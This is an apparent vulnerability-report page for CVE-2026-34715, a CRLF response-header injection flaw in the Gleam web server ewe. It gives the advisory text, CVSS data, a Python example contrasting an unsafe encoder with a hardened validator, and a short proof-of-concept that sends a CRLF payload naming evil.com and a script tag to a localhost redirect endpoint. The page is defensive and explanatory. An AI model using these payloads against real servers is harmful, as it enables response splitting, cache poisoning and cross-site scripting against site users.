Security Vulnerability Report
CVE-2026-34715 CVSS 5.3 MEDIUM

CVE-2026-34715

Published: 2026-04-02 18:16:33
Last Modified: 2026-04-10 16:01:13

Description

ewe is a Gleam web server. Prior to version 3.0.6, the encode_headers function in src/ewe/internal/encoder.gleam directly interpolates response header keys and values into raw HTTP bytes without validating or stripping CRLF (\r\n) sequences. An application that passes user-controlled data into response headers (e.g., setting a Location redirect header from a request parameter) allows an attacker to inject arbitrary HTTP response content, leading to response splitting, cache poisoning, and possible cross-site scripting. Notably, ewe does validate CRLF in incoming request headers via validate_field_value() in the HTTP/1.1 parser, but provides no equivalent protection for outgoing response headers in the encoder. This issue has been patched in version 3.0.6.
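To make the CWE-113 mechanism in the description concrete, the following is an added Python example; it is not ewe's code (which is Gleam) and is not taken from the advisory or the patch. It shows a minimal response encoder that interpolates header fields verbatim in the way the description attributes to encode_headers, a hardened variant that rejects CR, LF and NUL in header names and values, and a small client-side parser that shows what a browser or cache would make of the split response. The function and exception names, the hypothetical /redirect?next= handler, and the attacker input are constructed for this illustration.

```python
import re
from http.client import responses as REASON_PHRASES


class HeaderInjectionError(ValueError):
    """Raised when a header name or value could end or split the header block."""


# RFC 9110 token characters, the only ones allowed in a field name, and the
# bytes a field value must never carry: CR and LF end a header line (CWE-113)
# and NUL breaks many downstream parsers. Names are assumptions for this example.
_TOKEN_RE = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")
_FORBIDDEN_IN_VALUE = re.compile(r"[\r\n\x00]")


def _status_line(status: int) -> str:
    return f"HTTP/1.1 {status} {REASON_PHRASES.get(status, '')}".rstrip()


def encode_response_unsafe(status, headers, body=b""):
    """Vulnerable shape: each (name, value) is interpolated verbatim, so a
    CR/LF inside either one ends the field early and the remainder is emitted
    as further headers, or as the body once a blank line appears."""
    head = _status_line(status) + "\r\n"
    for name, value in headers:
        head += f"{name}: {value}\r\n"
    return head.encode("latin-1") + b"\r\n" + body


def validate_header(name, value):
    """Hardened check: refuse, rather than silently strip, any field that
    would not survive as a single header line."""
    if not _TOKEN_RE.match(name):
        raise HeaderInjectionError(f"invalid header name {name!r}")
    if _FORBIDDEN_IN_VALUE.search(value):
        raise HeaderInjectionError(f"CR, LF or NUL in value of {name!r}")
    return name, value.strip(" \t")


def encode_response_safe(status, headers, body=b""):
    """Same wire format as the unsafe encoder, but every field is validated first."""
    checked = [validate_header(n, v) for n, v in headers]
    return encode_response_unsafe(status, checked, body)


def is_rejected(headers) -> bool:
    """True if the hardened encoder refuses this header set."""
    try:
        encode_response_safe(200, headers)
    except HeaderInjectionError:
        return True
    return False


def parse_head(raw: bytes):
    """Minimal client-side view: status line, the headers up to the first blank
    line, and everything after it (what a client treats as the body)."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return lines[0], headers, rest


# Constructed attacker input for a hypothetical /redirect?next=... handler that
# copies the parameter into Location. It injects one header, then a blank line
# so that attacker-controlled markup becomes the response body.
ATTACKER_NEXT = (
    "http://evil.com\r\n"
    "X-Injected-Header: pwned\r\n"
    "\r\n"
    "<script>alert(1)</script>"
)
APP_HEADERS = [("Location", ATTACKER_NEXT), ("Content-Length", "0")]


if __name__ == "__main__":
    status, hdrs, rest = parse_head(encode_response_unsafe(302, APP_HEADERS))
    print(status, hdrs)               # the injected field is now a real header
    print(rest)                       # the script tag is now the response body
    print(is_rejected(APP_HEADERS))   # the hardened encoder refuses the same input
```

The hardened encoder raises instead of stripping the offending bytes: stripping turns a detectable attack into a silently altered header, and an application that reaches this point with CR/LF in a value has already lost control of the data, so failing the response is the safer default. Validating the name with the token grammar matters too, since the description notes that keys are interpolated as well as values.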

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:vshakitskiy:ewe:*:*:*:*:*:*:*:* - VULNERABLE
ewe < 3.0.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# PoC for CVE-2026-34715: ewe CRLF injection in response headers.
# Target scenario: an endpoint that copies the 'next' query parameter into a
# 'Location' redirect header without stripping CR/LF.
target_url = "http://localhost:4000/redirect"

# The payload carries raw CRLF (\r\n) so that, once the server writes it into
# the Location header, the response is split and an arbitrary header is added.
# requests percent-encodes these bytes as %0D%0A on the wire; a pre-encoded
# "%0d%0a" in the payload would be sent as "%250d%250a" and never decode to
# a line break.
payload = (
    "http://evil.com\r\n"
    "X-Injected-Header: pwned\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

try:
    # allow_redirects=False keeps the 3xx response itself so its headers can be
    # inspected instead of following the Location to evil.com.
    response = requests.get(
        target_url, params={"next": payload}, allow_redirects=False
    )
    print(f"Status Code: {response.status_code}")
    print("Response Headers:")
    for key, value in response.headers.items():
        print(f"{key}: {value}")

    # The injected header is only present if the server emitted the CRLF verbatim.
    if "X-Injected-Header" in response.headers:
        print("[+] Vulnerability exploited: Header injection successful!")
    else:
        print("[-] Exploit failed or target patched.")
except Exception as e:
    print(f"Error connecting to target: {e}")

References

https://github.com/vshakitskiy/ewe/commit/ce4ff214d32626a10fda9398dc94a2d720e17446 (Patch)
https://github.com/vshakitskiy/ewe/releases/tag/v3.0.6 (Product, Release Notes)
https://github.com/vshakitskiy/ewe/security/advisories/GHSA-x2w3-23jr-hrpf (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34715", "sourceIdentifier": "[email protected]", "published": "2026-04-02T18:16:32.910", "lastModified": "2026-04-10T16:01:12.507", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ewe is a Gleam web server. Prior to version 3.0.6, the encode_headers function in src/ewe/internal/encoder.gleam directly interpolates response header keys and values into raw HTTP bytes without validating or stripping CRLF (\\r\\n) sequences. An application that passes user-controlled data into response headers (e.g., setting a Location redirect header from a request parameter) allows an attacker to inject arbitrary HTTP response content, leading to response splitting, cache poisoning, and possible cross-site scripting. Notably, ewe does validate CRLF in incoming request headers via validate_field_value() in the HTTP/1.1 parser β€” but provides no equivalent protection for outgoing response headers in the encoder. This issue has been patched in version 3.0.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": 
"[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-113"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vshakitskiy:ewe:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.0.6", "matchCriteriaId": "B2FC5C49-3780-4196-A493-57F172153863"}]}]}], "references": [{"url": "https://github.com/vshakitskiy/ewe/commit/ce4ff214d32626a10fda9398dc94a2d720e17446", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/vshakitskiy/ewe/releases/tag/v3.0.6", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/vshakitskiy/ewe/security/advisories/GHSA-x2w3-23jr-hrpf", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/vshakitskiy/ewe/security/advisories/GHSA-x2w3-23jr-hrpf", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}